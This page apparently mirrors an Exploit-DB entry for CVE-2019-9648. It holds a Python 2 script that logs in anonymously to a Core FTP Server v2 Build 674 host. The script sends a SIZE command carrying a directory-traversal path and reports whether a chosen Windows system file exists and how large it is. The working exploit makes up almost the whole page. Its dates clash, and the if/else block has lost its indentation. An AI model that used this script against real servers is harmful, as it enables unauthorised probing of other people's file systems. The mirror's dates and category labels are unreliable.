Core FTP Server FTP / SFTP Server v2 Build 674 – ‘SIZE’ Directory Traversal - 体验盒子

作者： Kevin Randall
日期： 2019-03-13
类别：
dos
平台：
windows
来源：https://www.exploit-db.com/exploits/46535/
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648


#!/usr/bin/python

import socket
import sys

########################################################
###########Set Variables For Script Here################

file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"

########################################################
print ("""
 ###### # ############### ###### ##### ###########
 # # # # # # ## # ## # # # # # # ### #
 # # # # # # # # # # # # # # ### #
 # # # ##### ########### # ####### ########### ######## #####
 ## ## # # # # # # # # ####### # #
 # # # # # ## ## # # # # # ### #
##### ######## ####### ### ########## ##### ##### # #####

#######
# ## ###### ##### #####
##### ### # #
##### ## ## ### # #
# ## ######## # #
####### # #
####### ## ############ #

# # ###### # ##
### ###### ##### ##### ###### ### # # # #### ####### ## # ##
### ## # # # ### ## ## # # ## ### # ## #
### ## # # # ###### ################### # # ##
### ###### # # ### ## # ## ## ### # ## #
### # ## # # ## ### # # #### ## ### # ##
 ## #### # # # ###### ########## ## ###### ## # ##

 ######
 # # ## ## ####### ##
 # ##### # ######
 ######## # ## ## ## ##
 # # ###### ## # ## ###### ##
 #### # ## ## ## ##
 # # ## ## ####### ###### ######

 """)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.0.4',21))

s.recv(1024)
s.send('USER anonymous\r\n')

s.recv(1024)
s.send('PASS anonymous\r\n')

s.recv(1024)
s.recv(1024)
s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
result = s.recv(2048)
trimmedoutput = result.strip()
splitoutput = trimmedoutput.split(' ')
realresult = unicode (trimmedoutput,'utf-8')
realresult2 = unicode (splitoutput[1],'utf-8')
isnum = realresult.isnumeric()
isnum2 = realresult2.isnumeric()
if isnum2:
print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
else:
print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."

s.send('QUIT\r\n')

s.close